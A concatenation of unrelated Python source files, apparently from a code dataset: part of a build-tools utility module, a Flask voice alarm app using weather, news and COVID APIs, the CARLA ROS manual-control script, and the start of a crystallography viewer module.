if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either a integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## DeepCopy dict/OrderedDict recusively
#
# @param ori_dict a nested dict or ordereddict
#
# @retval new dict or orderdict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
return re.sub('//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
|
main.py
|
'''
This is the main alarms file
'''
# pylint: disable=line-too-long, unsubscriptable-object, global-statement, bare-except
import time
import json
import random
import sched
import threading
import logging
from datetime import datetime
import pyttsx3
from flask import Flask, request, render_template
from news_filter import get_news, get_news_from_api
from weather_update import get_weather, get_weather_from_api
from covid_update import get_covid
notifications = [] # an array for current notifications
old_notifications = [] # an array for removed notiifcations
alarms = [] # an array for the alarms
config = json.load(open('config.json')) # open the config file and load it as a dictionary
weather_api_key = config['weather_api_key'] # extract the weather api key
news_api_key = config['news_api_key'] # extract the news api key
s = sched.scheduler(time.time, time.sleep) # initialise the schedular
logging.basicConfig(filename='sys.log', level=logging.INFO) # initialise the logging module
app = Flask(__name__) # initialise the flask app
app.logger.disabled = True # disable console logging for flask
logging.getLogger('werkzeug').disabled = True # disable logging for flask in the log file
logging.getLogger('comtypes.client._code_cache').disabled = True # disable other kind of logging
try:
CURRENT_WEATHER = get_weather(get_weather_from_api(weather_api_key, config['city']).json()) # get the weather for current city
except:
logging.error('%s:An error occured with the weather API', datetime.now())
def trigger_alarm(data: dict) -> None:
'''
This function is used to trigger an alarm, it is only called on
when an alarm is meant to go off
keyword argument:
data -- the alarm information such as content, title etc.
'''
logging.info('Alarm called %s is going off at %s', data['title'], datetime.now())
engine = pyttsx3.init() # initialise the tts engine
engine.say('Your alarm called %s is going off' % data['title']) # announce that the alarm is going off
if data['weather']: # if the weather is enabled
try:
engine.say('''
The current temperature is {0} degrees celcius.
The level of humidity is {1} percent.
And lastly, the weather is described as {2}
'''.format(CURRENT_WEATHER['temperature'], CURRENT_WEATHER['humidity'], CURRENT_WEATHER['description'])) # announce the weather
except:
logging.error('%s:An error occured with the weather API', datetime.now())
if data['news']: # if the news is enabled
try:
three_articles = random.sample(get_news(get_news_from_api(news_api_key).json()), 3)
news_content = set([a['title'] for a in three_articles])
engine.say('Here are some top news articles: {0}'.format('. '.join(news_content))) # announce 3 random news articles
except:
logging.error('%s:An error occured with the news API', datetime.now())
try:
covid = get_covid() # get the covid data for england
cases = covid['newCasesByPublishDate'] # get cases today
deaths = covid['newDeaths28DaysByPublishDate'] # get deaths today for people who tested positive in the last 28 days
cum_cases = covid['cumCasesByPublishDate'] # get total cases
cum_deaths = covid['cumDeaths28DaysByPublishDate'] # get total deaths for people who tested positive in the last 28 days
engine.say('''
In regards, to COVID-19, there have been {0} cases and {1} deaths today.
In total, there have bee {2} cases and {3} deaths.
'''.format(cases, deaths, cum_cases, cum_deaths)) # announce the covid data
except:
logging.error('%s:An error occured with the covid API', datetime.now())
engine.runAndWait()
del data['alarm_object'] # delete the scheduler event from the dictionary
alarms.remove(data) # delete the alarm from the alarms list
@app.route('/index')
def index() -> None:
'''
This function runs whenever a user goes to /index
'''
try:
update_notifications() # update the notifications
except:
logging.error('%s:An error occured with updating the notifications')
notif = request.args.get('notif') # parse the url
alarm_item = request.args.get('alarm_item')
alarm = request.args.get('alarm')
news = bool(request.args.get('news'))
weather = bool(request.args.get('weather'))
if notif: # if they're removing a notification
for notification in notifications: # for each notification in the list of notifications
if notification['title'] == notif: # if the notification matches the notification being removed
notifications.remove(notification) # remove the notification from the list of notifications
old_notifications.insert(0, notification) # add the notification to the list of old notifications
logging.info('%s:"%s" was removed from the list of notifications', datetime.now(), notification['title'])
if alarm_item: # if they're removing an alarm
for alarm_ in alarms: # for each alarm in the list of alarms
if alarm_['title'] == alarm_item: # if the alarm matches the alarm being removed
alarms.remove(alarm_) # remove the alarm from the list of alarms
s.cancel(alarm_['alarm_object']) # cancel the alarm int he scheduler
try:
data = json.load(open('alarms.json')) # load the alarms.json file into a dictionary
del alarm_['alarm_object'] # delete the scheduler event from the dictionary
data.remove(alarm_) # remove the alarm from the alarms.json file
alarms_file = open('alarms.json', 'w') # open the alarms.json file with the ability to edit it
alarms_file.write(json.dumps(data, indent=4)) # save the new list of alarms to alarms.json
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue updating the alarms.json file', datetime.now())
logging.info('%s:"%s" was removed from the list of alarms', datetime.now(), alarm_['title'])
try:
if alarm: # if they're setting an alarm
alarm_date = datetime.strptime(alarm, '%Y-%m-%dT%H:%M').timestamp() # convert the date and time to a timestamp
current_date = datetime.now().timestamp() # get the current timestamp
if alarm_date - current_date > 0: # if the alarm is set in the future
content = 'The alarm is set to go off at {0}.'
if news: # if the news is going to be announced
content += ' The news will be announced.'
if weather: # if the weather is going to be announced
content += ' The weather will be announced.'
content = content.format(alarm.replace('T', ' '))
alarm_data = { # save the alarm data as a dictionary
'alarm': alarm,
'title': request.args.get('two'),
'news': news,
'weather': weather,
'content': content
}
try:
data = json.load(open('alarms.json')) # load the alarms.json file into a dictionary
data.append(alarm_data) # add the alarm to the alarms.json file
alarms_file = open('alarms.json', 'w') # open the alarms.json file with the ability to edit it
alarms_file.write(json.dumps(data, indent=4)) # save the new list of alarms to alarms.json
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue uploading the alarm to the alarms.json file', datetime.now())
alarm_object = s.enter(alarm_date - current_date, 1, trigger_alarm, (alarm_data, )) # schedule the alarm
threading.Thread(target=s.run).start() # create a new thread and run the scheduler and start the thread
alarm_data['alarm_object'] = alarm_object # append the schedule event to the alarm dictionary
alarms.append(alarm_data) # add the alarm to the list of alarms
logging.info('%s:An alarm called "%s" has been set for %s', datetime.now(), alarm_data['title'], datetime.fromtimestamp(alarm_date))
else:
logging.warning('%s:An alarm called "%s" was set for the past, it has been cancelled', datetime.now(), request.args.get('two'))
except ValueError:
logging.error('%s:The user entered an invalid date', datetime.now())
title = config['title'] # get the title for the alarm
return render_template('index.html', title=title, notifications=notifications, alarms=alarms, image='image.png') # render the page
def update_notifications() -> None:
'''
This function is used to update notifications with information
from the news, weather and covid api
'''
try:
for article in get_news(get_news_from_api(news_api_key).json()): # for each article in the articles from the api
if article not in notifications and article not in old_notifications: # if the notification isn't in current notifications and not in old notifications
notifications.insert(0, {
'title': article['title'],
'content': article['content']
}) # insert the notification in the list of notifications
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), article['title'])
except:
logging.error('%s:An error occured with the news API', datetime.now())
try:
new_weather = get_weather(get_weather_from_api(weather_api_key, config['city']).json()) # get the weather for the current city
global CURRENT_WEATHER # set the variable as a global variable
if new_weather != CURRENT_WEATHER: # if the weather has changed
content = ''
if new_weather['temperature'] != CURRENT_WEATHER['temperature']: # if the temperature changed
content += ' The temperature has changed from {0}°C to {1}°C.'.format(
str(CURRENT_WEATHER['temperature']), str(new_weather['temperature'])
)
if new_weather['humidity'] != CURRENT_WEATHER['humidity']: # if the humidity changed
content += ' The level of humidity has changed from {0}% to {1}%.'.format(
CURRENT_WEATHER['humidity'], new_weather['humidity']
)
if new_weather['description'] != CURRENT_WEATHER['description']: # if the description changed
content += ' The description of the weather has changed from {0} to {1}.'.format(
CURRENT_WEATHER['description'], new_weather['description']
)
notifications.insert(0, {
'title': 'Weather Update - {0}'.format(datetime.now().strftime('%d/%m/%Y %H:%M:%S')),
'content': content
}) # insert the weather update to the notifications
CURRENT_WEATHER = new_weather # update the current weather variable
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), notifications[0]['title'])
except:
logging.error('%s:An error occured with the weather API', datetime.now())
try:
covid = get_covid() # get the covid data for england
cases = covid['newCasesByPublishDate'] # get cases today
deaths = covid['newDeaths28DaysByPublishDate'] # get deaths today for people who tested positive in the last 28 days
cases_threshold = config['covid_infected_threshold'] # get the covid infected threshold from the config file
deaths_threshold = config['covid_death_threshold'] # get the covid death threshold from the config file
deaths = deaths if deaths else 0 # if deaths is None, set it as 0
if cases >= cases_threshold or deaths >= deaths_threshold: # if the cases or deaths is higher than the thresholds
covid_content = 'Thare are currently {0} new cases today, and {1} new deaths today'.format(cases, deaths)
covid_notif = {
'title': 'COVID Update',
'content': covid_content
}
if (covid_notif not in notifications) and (covid_notif not in old_notifications): # if the notification is new
notifications.insert(0, covid_notif) # insert the covid update to the notifications
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), covid_notif['title'])
except:
logging.error('%s:An error occured with the covid API', datetime.now())
def check_alarms() -> None:
'''
This function is used to retrieve any alarms that will go off
in the future in the case that the program restarts/crashes
'''
try:
alarms_file = open('alarms.json') # open the alarms.json file
data = json.load(alarms_file) # load it into the dictionary
for alarm in data: # for each alarm in the alarms file
alarm_date = datetime.strptime(alarm['alarm'], '%Y-%m-%dT%H:%M').timestamp() # get the date/time the alarm is meant to go off
current_date = datetime.now().timestamp() # gett he current date as a timestamp
delay = alarm_date - current_date # get the delay
if delay > 0: # if the alarm is going to go off in the future
alarm_object = s.enter(delay, 1, trigger_alarm, (alarm, )) # schedule the alarm
thread = threading.Thread(target=s.run) # create a new thread and run the scheduler
thread.start() # start the thread
alarm['alarm_object'] = alarm_object # append the schedule event to the alarm dictionary
alarms.append(alarm) # add the alarm to the list of alarms
logging.info('%s:An alarm called "%s" has been restored and set for %s', datetime.now(), alarm['title'], alarm_date)
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue loading the alarms from the alarms.json file', datetime.now())
if __name__ == '__main__':
update_notifications() # update the notifications
check_alarms() # check if there are any alarms saved that can be loaded in
app.run(port=config['port'], debug=True) # run the flask app
|
carla_manual_control.py
|
#!/usr/bin/env python
#
# Copyright (c) 2017 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
Welcome to CARLA ROS manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
B : toggle manual control
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
from carla_msgs.msg import CarlaStatus
from carla_msgs.msg import CarlaEgoVehicleInfo
from carla_msgs.msg import CarlaEgoVehicleStatus
from carla_msgs.msg import CarlaEgoVehicleControl
from carla_msgs.msg import CarlaLaneInvasionEvent
from carla_msgs.msg import CarlaCollisionEvent
from sensor_msgs.msg import Image
from sensor_msgs.msg import NavSatFix
from std_msgs.msg import Bool
from transforms3d.euler import quat2euler
from ros_compatibility import (
CompatibleNode,
latch_on,
ros_ok,
ros_init,
ros_shutdown,
loginfo,
logwarn,
ROS_VERSION)
import datetime
import math
import numpy
if ROS_VERSION == 1:
from rospy import Time
from tf import LookupException
from tf import ConnectivityException
from tf import ExtrapolationException
import tf
from ros_compatibility import QoSProfile
elif ROS_VERSION == 2:
import rclpy
from rclpy.time import Time
from rclpy.callback_groups import ReentrantCallbackGroup
from tf2_ros import LookupException
from tf2_ros import ConnectivityException
from tf2_ros import ExtrapolationException
import tf2_ros
from rclpy.qos import QoSProfile
from threading import Thread
from builtin_interfaces.msg import Time
else:
raise NotImplementedError("Make sure you have a valid ROS_VERSION env variable set.")
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_b
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class ManualControl(CompatibleNode):
"""
Handle the rendering
"""
def __init__(self, resolution):
super(ManualControl, self).__init__("ManualControl")
self._surface = None
self.role_name = self.get_param("role_name", "ego_vehicle")
self.hud = HUD(self.role_name, resolution['width'], resolution['height'], self)
self.controller = KeyboardControl(self.role_name, self.hud, self)
if ROS_VERSION == 1:
self.callback_group = None
elif ROS_VERSION == 2:
self.callback_group = ReentrantCallbackGroup()
self.image_subscriber = self.create_subscriber(
Image, "/carla/{}/rgb_view/image".format(self.role_name),
self.on_view_image, callback_group=self.callback_group)
self.collision_subscriber = self.create_subscriber(
CarlaCollisionEvent, "/carla/{}/collision".format(self.role_name),
self.on_collision, callback_group=self.callback_group)
self.lane_invasion_subscriber = self.create_subscriber(
CarlaLaneInvasionEvent, "/carla/{}/lane_invasion".format(self.role_name),
self.on_lane_invasion, callback_group=self.callback_group)
def on_collision(self, data):
"""
Callback on collision event
"""
intensity = math.sqrt(data.normal_impulse.x**2 +
data.normal_impulse.y**2 + data.normal_impulse.z**2)
self.hud.notification('Collision with {} (impulse {})'.format(
data.other_actor_id, intensity))
def on_lane_invasion(self, data):
"""
Callback on lane invasion event
"""
text = []
for marking in data.crossed_lane_markings:
if marking is CarlaLaneInvasionEvent.LANE_MARKING_OTHER:
text.append("Other")
elif marking is CarlaLaneInvasionEvent.LANE_MARKING_BROKEN:
text.append("Broken")
elif marking is CarlaLaneInvasionEvent.LANE_MARKING_SOLID:
text.append("Solid")
else:
text.append("Unknown ")
self.hud.notification('Crossed line %s' % ' and '.join(text))
def on_view_image(self, image):
"""
Callback when receiving a camera image
"""
array = numpy.frombuffer(image.data, dtype=numpy.dtype("uint8"))
array = numpy.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
def render(self, game_clock, display):
"""
render the current image
"""
do_quit = self.controller.parse_events(game_clock)
if do_quit:
return
self.hud.tick(game_clock)
if self._surface is not None:
display.blit(self._surface, (0, 0))
self.hud.render(display)
# ==============================================================================
# -- KeyboardControl -----------------------------------------------------------
# ==============================================================================
class KeyboardControl(object):
"""
Handle input events
"""
def __init__(self, role_name, hud, node):
self.role_name = role_name
self.hud = hud
self.node = node
self._autopilot_enabled = False
self._control = CarlaEgoVehicleControl()
self._steer_cache = 0.0
if ROS_VERSION == 1:
self.callback_group = None
elif ROS_VERSION == 2:
self.callback_group = ReentrantCallbackGroup()
fast_qos = QoSProfile(depth=10)
fast_latched_qos = QoSProfile(depth=10, durability=latch_on) # imported from ros_compat.
self.vehicle_control_manual_override_publisher = \
self.node.new_publisher(Bool,
"/carla/{}/vehicle_control_manual_override".format(
self.role_name),
qos_profile=fast_latched_qos, callback_group=self.callback_group)
self.vehicle_control_manual_override = False
self.auto_pilot_enable_publisher = \
self.node.new_publisher(Bool,
"/carla/{}/enable_autopilot".format(self.role_name),
qos_profile=fast_qos, callback_group=self.callback_group)
self.vehicle_control_publisher = \
self.node.new_publisher(CarlaEgoVehicleControl,
"/carla/{}/vehicle_control_cmd_manual".format(self.role_name),
qos_profile=fast_qos, callback_group=self.callback_group)
self.carla_status_subscriber = self.node.create_subscriber(CarlaStatus, "/carla/status",
self._on_new_carla_frame,
callback_group=self.callback_group)
self.set_autopilot(self._autopilot_enabled)
self.set_vehicle_control_manual_override(
self.vehicle_control_manual_override) # disable manual override
def set_vehicle_control_manual_override(self, enable):
"""
Set the manual control override
"""
self.hud.notification('Set vehicle control manual override to: {}'.format(enable))
self.vehicle_control_manual_override_publisher.publish((Bool(data=enable)))
def set_autopilot(self, enable):
"""
enable/disable the autopilot
"""
self.auto_pilot_enable_publisher.publish(Bool(data=enable))
# pylint: disable=too-many-branches
def parse_events(self, clock):
"""
parse an input event
"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return True
elif event.key == K_F1:
self.hud.toggle_info()
elif event.key == K_h or (event.key == K_SLASH and
pygame.key.get_mods() & KMOD_SHIFT):
self.hud.help.toggle()
elif event.key == K_b:
self.vehicle_control_manual_override = not self.vehicle_control_manual_override
self.set_vehicle_control_manual_override(self.vehicle_control_manual_override)
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_m:
self._control.manual_gear_shift = not self._control.manual_gear_shift
self.hud.notification(
'%s Transmission' %
('Manual' if self._control.manual_gear_shift else 'Automatic'))
elif self._control.manual_gear_shift and event.key == K_COMMA:
self._control.gear = max(-1, self._control.gear - 1)
elif self._control.manual_gear_shift and event.key == K_PERIOD:
self._control.gear = self._control.gear + 1
elif event.key == K_p:
self._autopilot_enabled = not self._autopilot_enabled
self.set_autopilot(self._autopilot_enabled)
self.hud.notification('Autopilot %s' %
('On' if self._autopilot_enabled else 'Off'))
if not self._autopilot_enabled and self.vehicle_control_manual_override:
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
self._control.reverse = self._control.gear < 0
def _on_new_carla_frame(self, data):
"""
callback on new frame
As CARLA only processes one vehicle control command per tick,
send the current from within here (once per frame)
"""
if not self._autopilot_enabled and self.vehicle_control_manual_override:
try:
self.vehicle_control_publisher.publish(self._control)
except Exception as error:
self.node.logwarn("Could not send vehicle control: {}".format(error))
def _parse_vehicle_keys(self, keys, milliseconds):
"""
parse key events
"""
self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = bool(keys[K_SPACE])
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
"""
Handle the info display
"""
def __init__(self, role_name, width, height, node):
self.role_name = role_name
self.dim = (width, height)
self.node = node
font = pygame.font.Font(pygame.font.get_default_font(), 20)
fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]
default_font = 'ubuntumono'
mono = default_font if default_font in fonts else fonts[0]
mono = pygame.font.match_font(mono)
self._font_mono = pygame.font.Font(mono, 14)
self._notifications = FadingText(font, (width, 40), (0, height - 40))
self.help = HelpText(pygame.font.Font(mono, 24), width, height)
self._show_info = True
self._info_text = []
self.vehicle_status = CarlaEgoVehicleStatus()
if ROS_VERSION == 1:
self.tf_listener = tf.TransformListener()
self.callback_group = None
elif ROS_VERSION == 2:
self.tf_buffer = tf2_ros.Buffer()
self.tf_listener = tf2_ros.TransformListener(self.tf_buffer, node=self.node)
self.callback_group = ReentrantCallbackGroup()
self.vehicle_status_subscriber = node.create_subscriber(
CarlaEgoVehicleStatus, "/carla/{}/vehicle_status".format(self.role_name),
self.vehicle_status_updated, callback_group=self.callback_group)
self.vehicle_info = CarlaEgoVehicleInfo()
self.vehicle_info_subscriber = node.create_subscriber(
CarlaEgoVehicleInfo, "/carla/{}/vehicle_info".format(self.role_name),
self.vehicle_info_updated, callback_group=self.callback_group, qos_profile=QoSProfile(depth=10, durability=latch_on))
self.latitude = 0
self.longitude = 0
self.manual_control = False
self.gnss_subscriber = node.create_subscriber(
NavSatFix, "/carla/{}/gnss".format(self.role_name), self.gnss_updated,
callback_group=self.callback_group)
self.manual_control_subscriber = node.create_subscriber(
Bool, "/carla/{}/vehicle_control_manual_override".format(self.role_name),
self.manual_control_override_updated, callback_group=self.callback_group)
self.carla_status = CarlaStatus()
self.status_subscriber = node.create_subscriber(CarlaStatus, "/carla/status",
self.carla_status_updated,
callback_group=self.callback_group)
def tick(self, clock):
"""
tick method
"""
self._notifications.tick(clock)
def carla_status_updated(self, data):
"""
Callback on carla status
"""
self.carla_status = data
self.update_info_text()
def manual_control_override_updated(self, data):
"""
Callback on vehicle status updates
"""
self.manual_control = data.data
self.update_info_text()
def vehicle_status_updated(self, vehicle_status):
"""
Callback on vehicle status updates
"""
self.vehicle_status = vehicle_status
self.update_info_text()
def vehicle_info_updated(self, vehicle_info):
"""
Callback on vehicle info updates
"""
self.vehicle_info = vehicle_info
self.update_info_text()
def gnss_updated(self, data):
"""
Callback on gnss position updates
"""
self.latitude = data.latitude
self.longitude = data.longitude
self.update_info_text()
def update_info_text(self):
"""
update the displayed info text
"""
if not self._show_info:
return
try:
if ROS_VERSION == 1:
(position, rotation) = self.tf_listener.lookupTransform(
'/map', self.role_name, Time())
elif ROS_VERSION == 2:
transform = self.tf_buffer.lookup_transform(
target_frame='map', source_frame=self.role_name, time=Time())
position = [transform.transform.translation.x,
transform.transform.translation.y,
transform.transform.translation.z]
rotation = [transform.transform.rotation.w,
transform.transform.rotation.x,
transform.transform.rotation.y,
transform.transform.rotation.z]
_, _, yaw = quat2euler(rotation)
yaw = math.degrees(yaw)
x = position[0]
y = position[1]
z = position[2]
except (LookupException, ConnectivityException, ExtrapolationException):
x = 0
y = 0
z = 0
yaw = 0
heading = 'N' if abs(yaw) < 89.5 else ''
heading += 'S' if abs(yaw) > 90.5 else ''
heading += 'E' if 179.5 > yaw > 0.5 else ''
heading += 'W' if -0.5 > yaw > -179.5 else ''
fps = 0
time = str(datetime.timedelta(seconds=self.node.get_time()))[:10]
if self.carla_status.fixed_delta_seconds:
fps = 1 / self.carla_status.fixed_delta_seconds
self._info_text = [
'Frame: % 22s' % self.carla_status.frame,
'Simulation time: % 12s' % time,
'FPS: % 24.1f' % fps, '',
'Vehicle: % 20s' % ' '.join(self.vehicle_info.type.title().split('.')[1:]),
'Speed: % 15.0f km/h' % (3.6 * self.vehicle_status.velocity),
u'Heading:% 16.0f\N{DEGREE SIGN} % 2s' % (yaw, heading),
'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (x, y)),
'GNSS:% 24s' % ('(% 2.6f, % 3.6f)' % (self.latitude, self.longitude)),
'Height: % 18.0f m' % z, ''
]
self._info_text += [
('Throttle:', self.vehicle_status.control.throttle, 0.0, 1.0),
('Steer:', self.vehicle_status.control.steer, -1.0, 1.0),
('Brake:', self.vehicle_status.control.brake, 0.0, 1.0),
('Reverse:', self.vehicle_status.control.reverse),
('Hand brake:', self.vehicle_status.control.hand_brake),
('Manual:', self.vehicle_status.control.manual_gear_shift),
'Gear: %s' % {
-1: 'R',
0: 'N'
}.get(self.vehicle_status.control.gear, self.vehicle_status.control.gear), ''
]
self._info_text += [('Manual ctrl:', self.manual_control)]
if self.carla_status.synchronous_mode:
self._info_text += [('Sync mode running:', self.carla_status.synchronous_mode_running)]
self._info_text += ['', '', 'Press <H> for help']
def toggle_info(self):
"""
show/hide the info text
"""
self._show_info = not self._show_info
def notification(self, text, seconds=2.0):
"""
display a notification for x seconds
"""
self._notifications.set_text(text, seconds=seconds)
def error(self, text):
"""
display an error
"""
self._notifications.set_text('Error: %s' % text, (255, 0, 0))
def render(self, display):
"""
render the display
"""
if self._show_info:
info_surface = pygame.Surface((220, self.dim[1]))
info_surface.set_alpha(100)
display.blit(info_surface, (0, 0))
v_offset = 4
bar_h_offset = 100
bar_width = 106
for item in self._info_text:
if v_offset + 18 > self.dim[1]:
break
if isinstance(item, list):
if len(item) > 1:
points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)
]
pygame.draw.lines(display, (255, 136, 0), False, points, 2)
item = None
v_offset += 18
elif isinstance(item, tuple):
if isinstance(item[1], bool):
rect = pygame.Rect((bar_h_offset + 50, v_offset + 8), (6, 6))
pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
else:
rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))
pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
f = (item[1] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + int(f * (bar_width - 6)), v_offset + 8),
(6, 6))
else:
rect = pygame.Rect((bar_h_offset, v_offset + 8),
(int(f * bar_width), 6))
pygame.draw.rect(display, (255, 255, 255), rect)
item = item[0]
if item: # At this point has to be a str.
surface = self._font_mono.render(item, True, (255, 255, 255))
display.blit(surface, (8, v_offset))
v_offset += 18
self._notifications.render(display)
self.help.render(display)
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
"""
Support Class for info display, fade out text
"""
def __init__(self, font, dim, pos):
self.font = font
self.dim = dim
self.pos = pos
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
def set_text(self, text, color=(255, 255, 255), seconds=2.0):
"""
set the text
"""
text_texture = self.font.render(text, True, color)
self.surface = pygame.Surface(self.dim)
self.seconds_left = seconds
self.surface.fill((0, 0, 0, 0))
self.surface.blit(text_texture, (10, 11))
def tick(self, clock):
"""
tick for fading
"""
delta_seconds = 1e-3 * clock.get_time()
self.seconds_left = max(0.0, self.seconds_left - delta_seconds)
self.surface.set_alpha(500.0 * self.seconds_left)
def render(self, display):
"""
render the fading
"""
display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
"""
Show the help text
"""
def __init__(self, font, width, height):
lines = __doc__.split('\n')
self.font = font
self.dim = (680, len(lines) * 22 + 12)
self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
self.surface.fill((0, 0, 0, 0))
for n, line in enumerate(lines):
text_texture = self.font.render(line, True, (255, 255, 255))
self.surface.blit(text_texture, (22, n * 22))
self._render = False
self.surface.set_alpha(220)
def toggle(self):
"""
Show/hide the help
"""
self._render = not self._render
def render(self, display):
"""
render the help
"""
if self._render:
display.blit(self.surface, self.pos)
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main(args=None):
"""
main function
"""
ros_init(args)
# resolution should be similar to spawned camera with role-name 'view'
resolution = {"width": 800, "height": 600}
pygame.init()
pygame.font.init()
pygame.display.set_caption("CARLA ROS manual control")
try:
display = pygame.display.set_mode((resolution['width'], resolution['height']),
pygame.HWSURFACE | pygame.DOUBLEBUF)
manual_control_node = ManualControl(resolution)
clock = pygame.time.Clock()
if ROS_VERSION == 2:
executer = rclpy.executors.MultiThreadedExecutor()
executer.add_node(manual_control_node)
spin_thread = Thread(target=executer.spin)
spin_thread.start()
while ros_ok():
clock.tick_busy_loop(60)
if manual_control_node.render(clock, display):
return
pygame.display.flip()
except KeyboardInterrupt:
loginfo("User requested shut down.")
finally:
ros_shutdown()
if ROS_VERSION == 2:
spin_thread.join()
pygame.quit()
if __name__ == '__main__':
main()
|
jsview_3d.py
|
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from scitbx import graphics_utils
from scitbx import matrix
from libtbx.utils import Sorry, to_str
from websocket_server import WebsocketServer
import threading, math, sys, cmath
from time import sleep
import os.path, time, copy
import libtbx
from libtbx import easy_mp
import webbrowser, tempfile
from six.moves import range
class ArrayInfo:
def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
from iotbx.gui_tools.reflections import get_array_description
